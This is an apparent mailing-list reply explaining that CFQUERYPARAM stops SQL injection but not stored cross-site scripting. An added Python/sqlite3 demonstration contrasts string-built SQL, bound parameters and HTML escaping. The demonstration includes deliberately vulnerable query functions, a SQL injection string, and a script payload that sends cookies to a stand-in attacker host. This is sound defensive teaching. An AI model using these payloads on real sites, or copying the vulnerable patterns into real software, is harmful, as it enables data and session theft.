> In the past I've used the CodeCleaner custom tag to scrub
> form inputs. Recently I've expanded my use of CFQUERYPARAM
> to include values in SQL UPDATE and INSERT statements,
> rather than just for the WHERE clause.
>
> Does cfqueryparam eliminate the need to scrub the code? My
> gut feeling is 'yes' for cfsqltype=cf_sql_numeric and an
> emphatic 'NO' for cfsqltype=cf_sql_varchar. Any confirmation/
> correction would be appreciated.
The CFQUERYPARAM tag will prevent any SQL injection attacks, unless you explicitly evaluate SQL strings in SQL within your SQL batch or stored procedure (which is a pretty rare thing to do). It may prevent SQL injection attacks even in those cases; I haven't tested that, myself.

The CFQUERYPARAM tag won't prevent the injection of non-SQL code (JavaScript, CF, etc.) within your SQL statements, though, and if you're going to SELECT the stuff in the database to build a page for someone else, that other code may be an issue. This is the basic underlying idea behind "cross-site scripting" exploits, in which a malicious user inputs code that will later be executed by another user. It's unlikely that CFML code will be useful for a cross-site scripting exploit, since it's relatively difficult to take strings from a database and evaluate them as CFML code, but JavaScript is used for this sort of thing all the time. Note that even HTML can be used for an exploit of this sort - a META refresh tag, for example.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444
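The three points in the reply above, shown in runnable form as an added example (this is not code from the original thread, and it is Python over sqlite3 rather than CFML, so the bound `?` placeholder stands in for `<cfqueryparam>`): a bound parameter turns an injection payload into an ordinary literal, a procedure that rebuilds SQL from an already-bound value loses that protection, and a parameterised INSERT/UPDATE faithfully stores script tags that must be escaped when rendered. The table, the attacker strings `SQLI` and `XSS`, and the `evil.example` host are all constructed for the demonstration.

```python
"""Added example: parameter binding vs. string-built SQL, dynamic SQL
inside the database, and stored XSS. Standard library only; every row
and payload below is constructed for the demonstration."""
import html
import sqlite3

# Constructed attacker inputs (not from the original post).
SQLI = "x' OR '1'='1"
XSS = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def make_db():
    """In-memory table standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, bio TEXT)")
    conn.executemany("INSERT INTO users (name, bio) VALUES (?, ?)",
                     [("alice", "hello"), ("bob", "hi")])
    conn.commit()
    return conn


def find_by_name_concat(conn, name):
    """Vulnerable: the equivalent of interpolating #form.name# into the SQL."""
    sql = "SELECT name FROM users WHERE name = '%s'" % name
    return sorted(r[0] for r in conn.execute(sql))


def find_by_name_param(conn, name):
    """Safe: the equivalent of <cfqueryparam cfsqltype="cf_sql_varchar">."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return sorted(r[0] for r in rows)


def find_by_id_param(conn, user_id):
    """Numeric column, bound parameter: a non-numeric payload simply matches nothing."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return sorted(r[0] for r in rows)


def find_by_name_dynamic_sql(conn, name):
    """Models the exception in the reply: the value arrives as a bound
    parameter, but a stored procedure then builds and executes a second
    statement from it (sqlite has no EXEC, so the string-building is done
    here). The bind protected the call, not the statement built inside."""
    bound = name  # delivered safely by the parameter binding
    sql = "SELECT name FROM users WHERE name = '" + bound + "'"
    return sorted(r[0] for r in conn.execute(sql))


def save_bio(conn, name, bio):
    """Parameterised UPDATE: stores the bio verbatim, script tags included."""
    conn.execute("UPDATE users SET bio = ? WHERE name = ?", (bio, name))
    conn.commit()


def render_bio_raw(conn, name):
    """Stored XSS: whatever was saved is emitted into another user's page."""
    bio = conn.execute("SELECT bio FROM users WHERE name = ?", (name,)).fetchone()[0]
    return "<p>%s</p>" % bio


def render_bio_escaped(conn, name):
    """Output encoding at render time is what the query parameter cannot do."""
    bio = conn.execute("SELECT bio FROM users WHERE name = ?", (name,)).fetchone()[0]
    return "<p>%s</p>" % html.escape(bio, quote=True)


if __name__ == "__main__":
    db = make_db()
    print("concat   :", find_by_name_concat(db, SQLI))       # both rows leak
    print("param    :", find_by_name_param(db, SQLI))        # nothing
    print("numeric  :", find_by_id_param(db, "1 OR 1=1"))    # nothing
    print("dynamic  :", find_by_name_dynamic_sql(db, SQLI))  # both rows leak again
    save_bio(db, "alice", XSS)
    print("raw      :", render_bio_raw(db, "alice"))
    print("escaped  :", render_bio_escaped(db, "alice"))
```

The `html.escape` step is the piece that scrubbing-on-input was standing in for: the parameter keeps the database honest, but only encoding at the point where the value is written into HTML keeps the next viewer's browser honest, and it also covers the META refresh case the reply mentions, since the angle brackets never reach the parser as markup.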

